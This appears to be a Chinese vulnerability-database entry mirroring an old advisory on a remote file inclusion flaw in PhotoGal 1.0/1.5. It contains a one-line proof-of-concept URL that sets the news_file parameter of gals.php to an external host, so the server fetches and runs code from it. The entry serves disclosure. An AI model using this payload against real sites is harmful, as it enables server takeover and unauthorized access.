PhotoGal 1.0/1.5 – News_File Remote File Inclusion

PhotoGal 1.0/1.5 – News_File Remote File Inclusion

漏洞ID 1055234 漏洞类型
发布时间 2005-07-07 更新时间 2005-07-07
图片[1]-PhotoGal 1.0/1.5 – News_File Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-PhotoGal 1.0/1.5 – News_File Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25955
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14190/info

PhotoGal is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

Successful exploitation of this issue will allow an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

Reports indicate that this issue may have been addressed in version 1.0, but this has not been confirmed. 

http://www.example.com/[path_to_photogal]/ops/gals.php?news_file=http://www.example.com

相关推荐: IkonBoard FUNC.pm漏洞

IkonBoard FUNC.pm漏洞 漏洞ID 1107274 漏洞类型 未知 发布时间 2003-04-15 更新时间 2003-09-22 CVE编号 CVE-2003-0770 CNNVD-ID CNNVD-200309-026 漏洞平台 CGI CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享